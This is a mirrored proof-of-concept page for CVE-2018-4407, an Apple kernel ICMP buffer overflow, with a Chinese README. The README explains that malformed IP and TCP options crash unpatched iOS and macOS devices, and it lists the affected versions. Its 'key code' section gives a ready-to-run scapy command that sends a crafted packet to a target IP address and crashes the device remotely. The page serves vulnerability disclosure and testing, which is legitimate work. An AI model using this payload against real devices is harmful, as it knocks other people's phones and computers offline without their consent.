CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

Source

https://github.com/s2339956/check_icmp_dos-CVE-2018-4407-

Associated Vulnerability

Title:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.

Description

CVE-2018-4407 概述與實現

Readme


## 原理
原理就是把"icmp"包的其他字段弄成非法 macOS or iphone 内核解析時沒實作檢查大小造成 crash 了

### 設備
1. Apple iOS 11及更早版本：所有設備

2. Apple macOS High Sierra（受影響的最高版本為10.13.6）：所有設備

3. Apple macOS Sierra（受影響的最高版本為10.12.6）：所有設備

4. Apple OS X El Capitan及更早版本：所有設備

蘋果在10月30日推出的"iOS 12.1"更新包中徹底修復了這個漏洞

## 關鍵代碼
```
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
```


### 連結
[中文解說](https://www.freebuf.com/vuls/188052.html) <br>
[英文解說](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407) <br>

File Snapshot


 [4.0K]  /data/pocs/23197c4f522c3da98aec9a49f0559cd7d2fc46b8
├── [ 785]  check_icmp_dos.py
└── [ 797]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!